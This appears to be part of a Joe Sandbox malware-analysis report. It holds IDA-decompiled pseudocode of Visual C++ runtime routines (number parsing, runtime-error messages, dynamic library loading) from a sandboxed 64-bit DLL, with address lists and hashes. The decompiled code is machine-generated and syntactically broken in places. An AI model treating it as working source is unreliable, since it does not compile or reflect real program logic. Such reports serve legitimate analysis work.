                                                                      				r8d = 0;
                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                      				_v168 = _t397;
                                                                      				E00000001180013858(__rax, __rbx, __rcx, __rdx, __rdx, _t389, __r8);
                                                                      				_t379 = _t388[1];
                                                                      				if (_t379 == 0) goto 0x8001b0ad;
                                                                      				 *_t379 =  *_t388;
                                                                      				goto 0x8001b0ad;
                                                                      				_t380 = _t399 + 2;
                                                                      				_t134 = r9b & 0xffffffff;
                                                                      				_t256 = r12d;
                                                                      				 *_t385 = _t380;
                                                                      				_t253 =  !=  ? _t134 : _t134 | 0x00000002;
                                                                      				if ((0x0000fffd & _t376 - 0x0000002b) != 0) goto 0x8001aac2;
                                                                      				_t197 =  *_t380 & 0x0000ffff;
                                                                      				_t371 =  &(_t380[1]);
                                                                      				 *_t388 = _t371;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t371 - 0x80; // 0x5e0
                                                                      				r9d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r10d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r11d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x8001ae30;
                                                                      				if (_t197 - 0x30 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - 0x3a >= 0) goto 0x8001abce;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - 0xff10 >= 0) goto 0x8001ad6b;
                                                                      				if (_t197 - r8w < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - 0x66a >= 0) goto 0x8001abf6;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - r10w < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - 0x6fa >= 0) goto 0x8001ac15;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - r11w < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - 0x970 >= 0) goto 0x8001ac34;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - r9w < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - 0x9f0 >= 0) goto 0x8001ac53;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - (_t197 & 0x0000ffff) - r9d < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _a16 >= 0) goto 0x8001ac73;
                                                                      				goto 0x8001ad7a;
                                                                      				if (_t197 - _v152 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v148 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v144 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v140 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v136 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v132 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v128 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v124 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v120 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v116 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v112 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v108 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v104 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v100 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v96 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v92 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v88 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v84 < 0) goto 0x8001abc4;
                                                                      				if (_t197 - _v80 < 0) goto 0x8001ad7f;
                                                                      				if (_t197 - _v76 < 0) goto 0x8001abc4;
                                                                      				if ((_t197 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8001ad7f;
                                                                      				goto 0x8001abc4;
                                                                      				if (_t197 - _v68 >= 0) goto 0x8001ad7f;
                                                                      				if ((_t197 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x8001ada1;
                                                                      				_t64 = _t380 - 0x41; // -17
                                                                      				_t65 = _t380 - 0x61; // -49
                                                                      				_t154 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x8001ad96;
                                                                      				if (_t154 - 0x19 > 0) goto 0x8001ae21;
                                                                      				if (_t154 - 0x19 > 0) goto 0x8001ad9e;
                                                                      				_t66 = _t380 - 0x37; // -231
                                                                      				if (_t66 != 0) goto 0x8001ae21;
                                                                      				_t381 =  *_t388;
                                                                      				r9d = 0xffdf;
                                                                      				_t246 =  *_t381 & 0x0000ffff;
                                                                      				_t67 =  &(_t381[1]); // 0xffe1
                                                                      				_t394 = _t67;
                                                                      				 *_t388 = _t394;
                                                                      				_t68 = _t385 - 0x58; // 0x698
                                                                      				if ((r9w & _t68) == 0) goto 0x8001ae09;
                                                                      				 *_t388 = _t381;
                                                                      				_t158 =  !=  ? r14d : 8;
                                                                      				r14d =  !=  ? r14d : 8;
                                                                      				if (_t246 == 0) goto 0x8001ae01;
                                                                      				if ( *_t381 == _t246) goto 0x8001ae01;
                                                                      				E00000001180013B18(_t371);
                                                                      				 *_t371 = 0x16;
                                                                      				E00000001180013928();
                                                                      				r8d = 0x660;
                                                                      				r10d = 0x6f0;
                                                                      				r11d = 0x966;
                                                                      				goto 0x8001ae30;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8001ae30;
                                                                      				_t198 =  *_t394 & 0x0000ffff;
                                                                      				_t71 =  &(_t394[1]); // 0xffe3
                                                                      				_t372 = _t71;
                                                                      				 *_t388 = _t372;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8001ae26;
                                                                      				_t163 =  !=  ? r14d : 0xa;
                                                                      				r14d = 0xa;
                                                                      				_t164 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				_t248 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				r13d = 0x30;
                                                                      				r15d = 0xff10;
                                                                      				r9d = 0xa / r14d;
                                                                      				if (_t198 - r13w < 0) goto 0x8001b000;
                                                                      				if (_t198 - 0x3a >= 0) goto 0x8001ae62;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - r15w >= 0) goto 0x8001afeb;
                                                                      				if (_t198 - r8w < 0) goto 0x8001b000;
                                                                      				if (_t198 - 0x66a >= 0) goto 0x8001ae8b;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - r10w < 0) goto 0x8001b000;
                                                                      				if (_t198 - 0x6fa >= 0) goto 0x8001aeaa;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - r11w < 0) goto 0x8001b000;
                                                                      				if (_t198 - 0x970 >= 0) goto 0x8001aec9;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - 0x9e6 < 0) goto 0x8001b000;
                                                                      				_t76 =  &(_t372[5]); // 0x9f0
                                                                      				if (_t198 - _t76 >= 0) goto 0x8001aee9;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - 0xa66 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _a16 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v152 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v148 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v144 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v140 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v136 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v132 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v128 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v124 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v120 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v116 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v112 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v108 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v104 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v100 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v96 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v92 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v88 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v84 < 0) goto 0x8001aedf;
                                                                      				if (_t198 - _v80 < 0) goto 0x8001b000;
                                                                      				if (_t198 - _v76 < 0) goto 0x8001aedf;
                                                                      				if ((_t198 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8001b000;
                                                                      				goto 0x8001affb;
                                                                      				if (_t198 - _v68 >= 0) goto 0x8001b000;
                                                                      				if ((_t198 & 0x0000ffff) - r15d != 0xffffffff) goto 0x8001b023;
                                                                      				_t100 = _t381 - 0x41; // -65
                                                                      				_t101 = _t381 - 0x61; // -97
                                                                      				_t184 = _t101;
                                                                      				if (_t100 - 0x19 <= 0) goto 0x8001b013;
                                                                      				if (_t184 - 0x19 > 0) goto 0x8001b020;
                                                                      				if (_t184 - 0x19 > 0) goto 0x8001b01b;
                                                                      				goto 0x8001b023;
                                                                      				_t395 =  *_t388;
                                                                      				if (((_t198 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x8001b067;
                                                                      				_t199 =  *_t395 & 0x0000ffff;
                                                                      				_t250 = _t372 + _t381;
                                                                      				_t257 = _t250;
                                                                      				r8d = 0x660;
                                                                      				 *_t388 =  &(_t395[1]);
                                                                      				_t254 = ( !=  ? _t134 : _t134 | 0x00000002) | (r12d & 0xffffff00 | _t250 - r12d * r14d > 0x00000000 | r12d & 0xffffff00 | _t256 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x8001ae47;
                                                                      				_t400 = _v64;
                                                                      				_t374 = _t395 - 2;
                                                                      				_t398 = _a8;
                                                                      				 *_t388 = _t374;
                                                                      				if (_t199 == 0) goto 0x8001b098;
                                                                      				if ( *_t374 == _t199) goto 0x8001b098;
                                                                      				E00000001180013B18(_t374);
                                                                      				 *_t374 = 0x16;
                                                                      				E00000001180013928();
                                                                      				if ((dil & 0x00000008) != 0) goto 0x8001b0b4;
                                                                      				_t375 = _t388[1];
                                                                      				 *_t388 = _t400;
                                                                      				if (_t375 == 0) goto 0x8001b0ad;
                                                                      				 *_t375 = _t400;
                                                                      				goto 0x8001b138;
                                                                      				r8d = 0x80000000;
                                                                      				r9d = _t395 - 1;
                                                                      				if ((dil & 0x00000004) != 0) goto 0x8001b0dc;
                                                                      				if ((dil & 0x00000001) == 0) goto 0x8001b11f;
                                                                      				if ((dil & 0x00000002) == 0) goto 0x8001b0d7;
                                                                      				if (_t257 - r8d <= 0) goto 0x8001b125;
                                                                      				goto 0x8001b0dc;
                                                                      				if (_t257 - r9d <= 0) goto 0x8001b127;
                                                                      				 *((char*)(_t398 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t398 + 0x2c)) = 0x22;
                                                                      				if ((_t254 & 0x00000001) != 0) goto 0x8001b0f7;
                                                                      				goto 0x8001b127;
                                                                      				_t386 = _t388[1];
                                                                      				if ((_t254 & 0x00000002) == 0) goto 0x8001b10f;
                                                                      				if (_t386 == 0) goto 0x8001b10a;
                                                                      				 *_t386 =  *_t388;
                                                                      				goto 0x8001b138;
                                                                      				if (_t386 == 0) goto 0x8001b11a;
                                                                      				 *_t386 =  *_t388;
                                                                      				goto 0x8001b138;
                                                                      				if ((dil & 0x00000002) == 0) goto 0x8001b127;
                                                                      				_t387 = _t388[1];
                                                                      				if (_t387 == 0) goto 0x8001b136;
                                                                      				 *_t387 =  *_t388;
                                                                      				return  ~(_t257 | 0xffffffff);
                                                                      			}




























































                                                                      0x18001a9fc
                                                                      0x18001a9fc
                                                                      0x18001a9fc
                                                                      0x18001aa01
                                                                      0x18001aa18
                                                                      0x18001aa1b
                                                                      0x18001aa1e
                                                                      0x18001aa26
                                                                      0x18001aa29
                                                                      0x18001aa2f
                                                                      0x18001aa31
                                                                      0x18001aa36
                                                                      0x18001aa3c
                                                                      0x18001aa41
                                                                      0x18001aa46
                                                                      0x18001aa4f
                                                                      0x18001aa51
                                                                      0x18001aa56
                                                                      0x18001aa59
                                                                      0x18001aa5d
                                                                      0x18001aa60
                                                                      0x18001aa6b
                                                                      0x18001aa70
                                                                      0x18001aa75
                                                                      0x18001aa7c
                                                                      0x18001aa85
                                                                      0x18001aa88
                                                                      0x18001aa91
                                                                      0x18001aa95
                                                                      0x18001aa99
                                                                      0x18001aa9e
                                                                      0x18001aaad
                                                                      0x18001aab6
                                                                      0x18001aab8
                                                                      0x18001aabb
                                                                      0x18001aabf
                                                                      0x18001aac2
                                                                      0x18001aad2
                                                                      0x18001aadf
                                                                      0x18001aaec
                                                                      0x18001aaf4
                                                                      0x18001aafa
                                                                      0x18001ab02
                                                                      0x18001ab02
                                                                      0x18001ab06
                                                                      0x18001ab0e
                                                                      0x18001ab14
                                                                      0x18001ab1c
                                                                      0x18001ab22
                                                                      0x18001ab2a
                                                                      0x18001ab32
                                                                      0x18001ab3a
                                                                      0x18001ab42
                                                                      0x18001ab4a
                                                                      0x18001ab52
                                                                      0x18001ab5a
                                                                      0x18001ab62
                                                                      0x18001ab6a
                                                                      0x18001ab72
                                                                      0x18001ab7a
                                                                      0x18001ab82
                                                                      0x18001ab8a
                                                                      0x18001ab92
                                                                      0x18001ab9d
                                                                      0x18001abaf
                                                                      0x18001abb8
                                                                      0x18001abc2
                                                                      0x18001abc9
                                                                      0x18001abd1
                                                                      0x18001abdb
                                                                      0x18001abe9
                                                                      0x18001abf1
                                                                      0x18001abfa
                                                                      0x18001ac08
                                                                      0x18001ac10
                                                                      0x18001ac19
                                                                      0x18001ac27
                                                                      0x18001ac2f
                                                                      0x18001ac38
                                                                      0x18001ac46
                                                                      0x18001ac4e
                                                                      0x18001ac56
                                                                      0x18001ac64
                                                                      0x18001ac6e
                                                                      0x18001ac7a
                                                                      0x18001ac85
                                                                      0x18001ac92
                                                                      0x18001ac9d
                                                                      0x18001acaa
                                                                      0x18001acb5
                                                                      0x18001acc2
                                                                      0x18001accd
                                                                      0x18001acda
                                                                      0x18001ace5
                                                                      0x18001acf2
                                                                      0x18001acfd
                                                                      0x18001ad0a
                                                                      0x18001ad11
                                                                      0x18001ad1e
                                                                      0x18001ad25
                                                                      0x18001ad32
                                                                      0x18001ad39
                                                                      0x18001ad46
                                                                      0x18001ad4d
                                                                      0x18001ad64
                                                                      0x18001ad66
                                                                      0x18001ad73
                                                                      0x18001ad7d
                                                                      0x18001ad82
                                                                      0x18001ad88
                                                                      0x18001ad88
                                                                      0x18001ad8b
                                                                      0x18001ad90
                                                                      0x18001ad99
                                                                      0x18001ad9e
                                                                      0x18001ada3
                                                                      0x18001ada5
                                                                      0x18001ada8
                                                                      0x18001adae
                                                                      0x18001adb1
                                                                      0x18001adb1
                                                                      0x18001adb5
                                                                      0x18001adb8
                                                                      0x18001adbf
                                                                      0x18001adc4
                                                                      0x18001adcc
                                                                      0x18001add0
                                                                      0x18001add6
                                                                      0x18001addb
                                                                      0x18001addd
                                                                      0x18001ade2
                                                                      0x18001ade8
                                                                      0x18001aded
                                                                      0x18001adf3
                                                                      0x18001adf9
                                                                      0x18001adff
                                                                      0x18001ae01
                                                                      0x18001ae07
                                                                      0x18001ae09
                                                                      0x18001ae0d
                                                                      0x18001ae0d
                                                                      0x18001ae11
                                                                      0x18001ae14
                                                                      0x18001ae1f
                                                                      0x18001ae29
                                                                      0x18001ae2d
                                                                      0x18001ae32
                                                                      0x18001ae35
                                                                      0x18001ae35
                                                                      0x18001ae38
                                                                      0x18001ae3e
                                                                      0x18001ae44
                                                                      0x18001ae4b
                                                                      0x18001ae55
                                                                      0x18001ae5d
                                                                      0x18001ae66
                                                                      0x18001ae70
                                                                      0x18001ae7e
                                                                      0x18001ae86
                                                                      0x18001ae8f
                                                                      0x18001ae9d
                                                                      0x18001aea5
                                                                      0x18001aeae
                                                                      0x18001aebc
                                                                      0x18001aec4
                                                                      0x18001aed1
                                                                      0x18001aed7
                                                                      0x18001aedd
                                                                      0x18001aee4
                                                                      0x18001aef1
                                                                      0x18001aeff
                                                                      0x18001af08
                                                                      0x18001af13
                                                                      0x18001af1c
                                                                      0x18001af27
                                                                      0x18001af30
                                                                      0x18001af3b
                                                                      0x18001af44
                                                                      0x18001af4f
                                                                      0x18001af58
                                                                      0x18001af63
                                                                      0x18001af70
                                                                      0x18001af7b
                                                                      0x18001af88
                                                                      0x18001af8f
                                                                      0x18001af9c
                                                                      0x18001afa3
                                                                      0x18001afb0
                                                                      0x18001afb7
                                                                      0x18001afc4
                                                                      0x18001afcb
                                                                      0x18001afe2
                                                                      0x18001afe9
                                                                      0x18001aff3
                                                                      0x18001affe
                                                                      0x18001b003
                                                                      0x18001b009
                                                                      0x18001b009
                                                                      0x18001b00c
                                                                      0x18001b011
                                                                      0x18001b016
                                                                      0x18001b01e
                                                                      0x18001b023
                                                                      0x18001b029
                                                                      0x18001b02b
                                                                      0x18001b035
                                                                      0x18001b046
                                                                      0x18001b054
                                                                      0x18001b05d
                                                                      0x18001b060
                                                                      0x18001b062
                                                                      0x18001b067
                                                                      0x18001b06f
                                                                      0x18001b073
                                                                      0x18001b07b
                                                                      0x18001b081
                                                                      0x18001b086
                                                                      0x18001b088
                                                                      0x18001b08d
                                                                      0x18001b093
                                                                      0x18001b09c
                                                                      0x18001b09e
                                                                      0x18001b0a2
                                                                      0x18001b0a8
                                                                      0x18001b0aa
                                                                      0x18001b0af
                                                                      0x18001b0b4
                                                                      0x18001b0ba
                                                                      0x18001b0c2
                                                                      0x18001b0c8
                                                                      0x18001b0ce
                                                                      0x18001b0d3
                                                                      0x18001b0d5
                                                                      0x18001b0da
                                                                      0x18001b0de
                                                                      0x18001b0e6
                                                                      0x18001b0f0
                                                                      0x18001b0f5
                                                                      0x18001b0f7
                                                                      0x18001b0fd
                                                                      0x18001b102
                                                                      0x18001b107
                                                                      0x18001b10d
                                                                      0x18001b112
                                                                      0x18001b117
                                                                      0x18001b11d
                                                                      0x18001b123
                                                                      0x18001b127
                                                                      0x18001b12e
                                                                      0x18001b133
                                                                      0x18001b152

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$p$p
                                                                      • API String ID: 3215553584-1995029353
                                                                      • Opcode ID: d9f5e7d9e1ec5bf5845b5bb8583a2d3c4251b6d6c38583b1b0281a15135c5e51
                                                                      • Instruction ID: e5ad5a1e6636a2dbec403dcb9a177e7928c1f891dc11f83372d7be6599820c36
                                                                      • Opcode Fuzzy Hash: d9f5e7d9e1ec5bf5845b5bb8583a2d3c4251b6d6c38583b1b0281a15135c5e51
                                                                      • Instruction Fuzzy Hash: 1712C53260898986FBA6AE54E0547EA7696F35D7D4F84C115F6D247AC8DF3CCB88CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E00000001180057248(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _t15;
                                                                      				void* _t45;
                                                                      				void* _t64;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r9;
                                                                      				_t66 = __rsi;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t45 = __rcx;
                                                                      				_t15 = E00000001180059990(3, __rax);
                                                                      				if (_t15 == 1) goto 0x8005736f;
                                                                      				if (_t15 != 0) goto 0x80057289;
                                                                      				if ( *0x800720f0 == 1) goto 0x8005736f;
                                                                      				r14d = 0x314;
                                                                      				if (E00000001180045614(__rax, 0x80072100, __rdx, L"Runtime Error!\n\nProgram: ") != 0) goto 0x80057390;
                                                                      				 *0x8007233a = 0;
                                                                      				r8d = 0x104;
                                                                      				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x800572f0;
                                                                      				if (E00000001180045614(__rax, 0x80072132, 0x80072132, L"<program name unknown>") != 0) goto 0x80057390;
                                                                      				if ( *0x480156396 != 0) goto 0x800572f4;
                                                                      				if (0x180072133 - 0x3c <= 0) goto 0x80057330;
                                                                      				r9d = 3;
                                                                      				if (E0000000118004B224(0xffffffffffffffc5, __rcx, 0x1800720bc, _t64 - 0xffffffffffffffc5, __rsi, L"...", __r9) != 0) goto 0x80057390;
                                                                      				if (E0000000118004AEA8(0xffffffffffffffc5, 0x80072100, _t81, L"\n\n") != 0) goto 0x80057390;
                                                                      				_t78 = __rcx;
                                                                      				if (E0000000118004AEA8(0xffffffffffffffc5, 0x80072100, _t81, __rcx) != 0) goto 0x80057390;
                                                                      				r8d = 0x12010;
                                                                      				E00000001180059C20(0, _t81 - 0x19, 0xffffffffffffffc5, __rcx, 0x80072100, L"Microsoft Visual C++ Runtime Library", _t66, 0x80072100, __rcx, _t79, _t80);
                                                                      				goto 0x80057377;
                                                                      				return E000000011800571A0(_t81 - 0x19, _t45, _t78);
                                                                      			}








                                                                      0x180057248
                                                                      0x180057248
                                                                      0x180057248
                                                                      0x18005724d
                                                                      0x180057252
                                                                      0x180057260
                                                                      0x180057268
                                                                      0x180057270
                                                                      0x18005727a
                                                                      0x180057283
                                                                      0x180057289
                                                                      0x1800572aa
                                                                      0x1800572b7
                                                                      0x1800572c1
                                                                      0x1800572d5
                                                                      0x1800572ea
                                                                      0x1800572fc
                                                                      0x180057306
                                                                      0x18005730c
                                                                      0x18005732e
                                                                      0x180057344
                                                                      0x180057346
                                                                      0x180057356
                                                                      0x180057358
                                                                      0x180057368
                                                                      0x18005736d
                                                                      0x18005738f

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleName_set_error_mode
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 3581924421-4022980321
                                                                      • Opcode ID: 1c5d91d59597b8fa4821d8630b7b7a44c75af290db469db1aaf4132d35bbc8b4
                                                                      • Instruction ID: 762a9bb0a511f039f0861ad2b303dfe2c2015d566524bac6263f4973912dccb4
                                                                      • Opcode Fuzzy Hash: 1c5d91d59597b8fa4821d8630b7b7a44c75af290db469db1aaf4132d35bbc8b4
                                                                      • Instruction Fuzzy Hash: CD31E531300A4985FBE6DB22A8103EA6395B75CBE4F408516FE29576E2DF3AC34ED340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E0000000118000F550(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				struct HINSTANCE__* _t81;
                                                                      				long long _t85;
                                                                      				void* _t89;
                                                                      				struct HINSTANCE__* _t94;
                                                                      				long _t97;
                                                                      				void* _t100;
                                                                      				signed long long _t101;
                                                                      				WCHAR* _t104;
                                                                      
                                                                      				 *((long long*)(_t89 + 8)) = __rbx;
                                                                      				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                      				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                      				_t101 = _t100 | 0xffffffff;
                                                                      				_t61 =  *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8));
                                                                      				if (_t61 == _t101) goto 0x8000f67f;
                                                                      				if (_t61 != 0) goto 0x8000f681;
                                                                      				if (__r8 == __r9) goto 0x8000f677;
                                                                      				_t67 =  *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8));
                                                                      				if (_t67 == 0) goto 0x8000f5c2;
                                                                      				if (_t67 != _t101) goto 0x8000f659;
                                                                      				goto 0x8000f62d;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t104, _t100, _t97);
                                                                      				_t68 = _t61;
                                                                      				if (_t61 != 0) goto 0x8000f639;
                                                                      				if (GetLastError() != 0x57) goto 0x8000f61b;
                                                                      				_t14 = _t68 + 7; // 0x7
                                                                      				r8d = _t14;
                                                                      				if (E0000000118003C5E8(__r8) == 0) goto 0x8000f61b;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t61 != 0) goto 0x8000f639;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8)) = _t101;
                                                                      				goto 0x8000f5a0;
                                                                      				_t21 = 0x180000000 + 0x71410 + __rsi * 8;
                                                                      				_t65 =  *_t21;
                                                                      				 *_t21 = _t61;
                                                                      				if (_t65 == 0) goto 0x8000f659;
                                                                      				FreeLibrary(_t94);
                                                                      				GetProcAddress(_t81);
                                                                      				if (_t65 == 0) goto 0x8000f677;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8)) = _t65;
                                                                      				goto 0x8000f681;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8)) = _t101;
                                                                      				return 0;
                                                                      			}















                                                                      0x18000f550
                                                                      0x18000f555
                                                                      0x18000f55a
                                                                      0x18000f575
                                                                      0x18000f582
                                                                      0x18000f58e
                                                                      0x18000f597
                                                                      0x18000f5a0
                                                                      0x18000f5a9
                                                                      0x18000f5b5
                                                                      0x18000f5ba
                                                                      0x18000f5c0
                                                                      0x18000f5cf
                                                                      0x18000f5d5
                                                                      0x18000f5db
                                                                      0x18000f5e1
                                                                      0x18000f5ec
                                                                      0x18000f5ee
                                                                      0x18000f5ee
                                                                      0x18000f603
                                                                      0x18000f605
                                                                      0x18000f60d
                                                                      0x18000f619
                                                                      0x18000f625
                                                                      0x18000f634
                                                                      0x18000f643
                                                                      0x18000f643
                                                                      0x18000f643
                                                                      0x18000f64e
                                                                      0x18000f653
                                                                      0x18000f65f
                                                                      0x18000f668
                                                                      0x18000f66d
                                                                      0x18000f675
                                                                      0x18000f677
                                                                      0x18000f69d

                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F5D5
                                                                      • GetLastError.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F5E3
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F60D
                                                                      • FreeLibrary.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F653
                                                                      • GetProcAddress.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F65F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
